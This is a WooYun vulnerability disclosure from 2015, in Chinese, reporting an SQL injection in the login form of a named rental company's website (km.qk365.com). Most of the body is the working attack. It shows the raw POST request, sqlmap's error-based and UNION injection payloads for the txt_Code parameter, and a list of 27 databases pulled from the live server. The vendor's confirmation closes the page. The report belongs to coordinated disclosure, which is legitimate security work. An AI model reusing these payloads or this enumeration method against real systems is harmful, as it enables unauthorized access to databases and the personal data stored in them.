当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152112

漏洞标题:青客SQL注入(27库)

相关厂商:qk365.com

漏洞作者: 天地不仁 以万物为刍狗

提交时间:2015-11-06 11:13

修复时间:2015-12-21 19:02

公开时间:2015-12-21 19:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-06: 细节已通知厂商并且等待厂商处理中
2015-11-06: 厂商已经确认,细节仅向厂商公开
2015-11-16: 细节向核心白帽子及相关领域专家公开
2015-11-26: 细节向普通白帽子公开
2015-12-06: 细节向实习白帽子公开
2015-12-21: 细节向公众公开

简要描述:

2333

详细说明:

POST /Tentct/Login.aspx HTTP/1.1
Host: km.qk365.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://km.qk365.com/Tentct/Login.aspx
Cookie: Hm_lvt_53c8bf761df44282a0cf7d4949581592=1446710154; Hm_lpvt_53c8bf761df44282a0cf7d4949581592=1446710163; _ga=GA1.2.837828670.1446710155; LXB_REFER=www.wooyun.org; ASP.NET_SessionId=xz1yzy55pt5wpqizuh5k2k55
X-Forwarded-For: 8.8.8.8'
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUJNzkyODY2ODA2ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b%2BrTX22oGpB3az%2BQ5MK&txt_Code=admin&txt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=%2FwEWBALXrurxCALLm6aZAgLS9cL8AgKrg9HsD%2F6wTuGPHEaKThJjkc8fmNFk3e%2BR


txt_Code可注入

0.png


1.png


漏洞证明:

POST parameter 'txt_Code' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 42 HTTP(s) re
quests:
---
Parameter: txt_Code (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBg
BBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGp
B3az+Q5MK&txt_Code=admin' AND 3112=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(
112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3112=3112) THEN CHAR(49) ELSE CHAR(4
8) END))+CHAR(113)+CHAR(106)+CHAR(112)+CHAR(118)+CHAR(113))) AND 'yCuW'='yCuW&tx
t_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxCA
LLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R
    Type: UNION query
    Title: Generic UNION query (NULL) - 17 columns
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJNzkyODY2ODA2ZBg
BBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUKaW1hZ2VGaWVsZGAUS7Bo2b+rTX22oGp
B3az+Q5MK&txt_Code=admin' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(11
3)+CHAR(112)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(82)+CHAR(80)+CHAR(67)+CHAR(104)+C
HAR(81)+CHAR(89)+CHAR(110)+CHAR(81)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(106)+CHAR
(112)+CHAR(118)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &t
xt_Password=123456&imageField.x=0&imageField.y=0&__EVENTVALIDATION=/wEWBALXrurxC
ALLm6aZAgLS9cL8AgKrg9HsD/6wTuGPHEaKThJjkc8fmNFk3e+R
---
[18:16:02] [INFO] testing Microsoft SQL Server
[18:16:03] [INFO] confirming Microsoft SQL Server
[18:16:04] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[18:16:04] [INFO] fetching database names
[18:16:04] [INFO] the SQL query used returns 28 entries
[18:16:04] [INFO] retrieved: 20141231
[18:16:05] [INFO] retrieved: master
[18:16:05] [INFO] retrieved: model
[18:16:05] [INFO] retrieved: msdb
[18:16:06] [INFO] retrieved: new_0430
[18:16:06] [INFO] retrieved: new_HouseRent_20141130
[18:16:06] [INFO] retrieved: new_HouseRent_20141130
[18:16:07] [INFO] retrieved: new_HouseRent_20141201
[18:16:07] [INFO] retrieved: new_HouseRent_20141228
[18:16:07] [INFO] retrieved: new_HouseRent_20150119
[18:16:07] [INFO] retrieved: new_HouseRent_20150120
[18:16:08] [INFO] retrieved: new_HouseRent_20150205
[18:16:08] [INFO] retrieved: new_HouseRent_20150301
[18:16:08] [INFO] retrieved: new_HouseRent_20150306
[18:16:10] [INFO] retrieved: new_HouseRent_20150325
[18:16:11] [INFO] retrieved: new_HouseRent_20150401
[18:16:11] [INFO] retrieved: new_HouseRent_20150405
[18:16:11] [INFO] retrieved: new_HouseRent_20150501_0
[18:16:11] [INFO] retrieved: new_HouseRent_20150605
[18:16:11] [INFO] retrieved: new_HouseRent_20150731
[18:16:12] [INFO] retrieved: new_HouseRent_20150930
[18:16:12] [INFO] retrieved: ReportServer
[18:16:12] [INFO] retrieved: ReportServerTempDB
[18:16:15] [INFO] retrieved: tempdb
[18:16:16] [INFO] retrieved: tmp_1018
[18:16:16] [INFO] retrieved: tmp_1019
[18:16:16] [INFO] retrieved: tmp_1020
[18:16:16] [INFO] retrieved: tmp_111
available databases [27]:
[*] 20141231
[*] master
[*] model
[*] msdb
[*] new_0430
[*] new_HouseRent_20141130
[*] new_HouseRent_20141201
[*] new_HouseRent_20141228
[*] new_HouseRent_20150119
[*] new_HouseRent_20150120
[*] new_HouseRent_20150205
[*] new_HouseRent_20150301
[*] new_HouseRent_20150306
[*] new_HouseRent_20150325
[*] new_HouseRent_20150401
[*] new_HouseRent_20150405
[*] new_HouseRent_20150501_0
[*] new_HouseRent_20150605
[*] new_HouseRent_20150731
[*] new_HouseRent_20150930
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tmp_1018
[*] tmp_1019
[*] tmp_1020
[*] tmp_111
[18:16:17] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 52 times
[18:16:17] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\km.qk365.com'
[*] shutting down at 18:16:17

修复方案:

版权声明:转载请注明来源 天地不仁 以万物为刍狗@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-06 19:01

厂商回复:

非常感谢,已经安排紧急修复

最新状态:

暂无